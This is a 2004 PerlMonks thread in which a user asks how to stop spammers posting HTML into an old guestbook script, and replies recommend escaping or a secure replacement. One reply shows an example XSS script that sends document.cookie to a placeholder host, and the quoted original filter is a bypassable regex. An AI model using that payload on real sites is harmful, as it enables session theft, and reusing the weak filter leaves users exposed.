Beefy Boxes and Bandwidth Generously Provided by pair Networks
Just another Perl shrine
 
PerlMonks  

Emergency! Our guestbook is getting trashed by HTML!

by JCHallgren (Sexton)
on Dec 17, 2004 at 15:04 UTC ( [id://415651]=perlquestion: print w/replies, xml ) Need Help??

JCHallgren has asked for the wisdom of the Perl Monks concerning the following question:

TOTAL NEWBIE here! I am NOT a programmer in Perl and don't wish to be...however, I belong to a Chatroom that uses common freeware code...we are having problem with spammers posting HTML comments "" that knock out OUR post entries...i am trying to assist the owner of list with problem... will setting "$allow_html to 0" block HTML code from being entered? i see that it does something, but have NO clue as to what... I would LOVE to set the value of "comments" field to SPACES upon detection of ANY HTML code in it so that it would fall into the blank comments error routine and thus block that entry! How could I do so??? THANKS!! This is section of code from original GUESTBOOK from Matt's Script Archive that i need HELP with: 
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);

# Un-Webify plus signs and %-encoding
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ s/<!--(.|\n)*-->//g;

if ($allow_html != 1) {
$value =~ s/<([^>]|\n)*>//g;
}

$FORM{$name} = $value;}

# Print the Blank Response Subroutines
&no_comments unless $FORM{'comments'};
&no_name unless $FORM{'realname'};

[download]

Replies are listed 'Best First'.
Re: Emergency! Our guestbook is getting trashed by HTML!
by ikegami (Patriarch) on Dec 17, 2004 at 15:21 UTC

    Setting $allow_html to 0 will *attempt* to remove HTML. It will fail if the person supplies a < without a matching >. Fixing it would be convoluted. It's easier to just escape < and >:

    if ($allow_html != 1) {
   $value =~ s/</&lt;/g;
   $value =~ s/>/&gt;/g;
}

    [download]

    Better yet, have a look at secure versions of Matt's scripts.

[reply]
[d/l]
[select]
      THis or something similar should be in any code that re-displays user entered input. HTML::Entities can do a very good job with this. While an unclosed <H1> may be inconvienent this can be even worse: 
      
<script>
document.location='http://nasty.site/cgi-bin/cookie.cgi?'%20+document.
+cookie
</script>

      [download]
      take a look at http://www.cgisecurity.com/articles/xss-faq.shtml#theft for information on why this can be "very bad"

      in short: never display uncooked user input in a web page unless you have a very good reason to.

[reply]
[d/l]
        Yah, you should look at http://www.shocking.com/~rsnake/xss.html There are a lot of risks there, it seems.
[reply]
Re: Emergency! Our guestbook is getting trashed by HTML!
by Ovid (Cardinal) on Dec 17, 2004 at 16:01 UTC
[reply]
Re: Emergency! Our guestbook is getting trashed by HTML!
by gellyfish (Monsignor) on Dec 17, 2004 at 16:03 UTC

    The NMS guestbook can be used as a direct replacement to the one from Matts Script Archive and implements HTML filtering on the contents of the posts. It is probably easiest to simply replace the program than fix the MSA guestbook.

    /J\

[reply]
      I am EXTREMLY grateful for ALL the replies!! THANKS a MILLION! Some spammers have apparently decided to blast a number of "guestbook" boards around the Net...found exactly same junk entries on three other ones via Google of the junk email addr used!
[reply]
Re: Emergency! Our guestbook is getting trashed by HTML!
by DrHyde (Prior) on Dec 20, 2004 at 09:29 UTC
    TOTAL NEWBIE here! I am NOT a programmer in Perl and don't wish to be.

    Then you're in the wrong place. It seems that you want people to solve your problem but you're not willing to work with them on this. That, to me, indicates that you should be paying someone. Additionally, if you put "matt's script archive guestbook perl" in to our friend google, it comes back with the solution that others here have recommended *as the very first result*.

[reply]
      I simply meant that I wished to either get a quikie one/two line fix to existing code -or- pointer to newer/better code..which I got...THANKS...and I HAD searched via Google for a hour or so...but NEVER found the NMS scripts...maybe I used the wrong query...did not use that exact phrasing...what I DID find was this forum! I also do not have ready access to library/bookstore here which I would have tried also before posting... FYI: I have been a COBOL programmer for 23+ yrs so programming is not totally foreign to me...also did Z-80 assembler years ago for "fun"...however, at this time, i needed a simple answer..so looked here, ok?
[reply]

Back to Seekers of Perl Wisdom

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?

www.com | www.net | www.org
Node Status?
node history
Node Type: perlquestion [id://415651]
Approved by Happy-the-monk
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others chanting in the Monastery: (4)
As of 2024-04-24 15:18 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found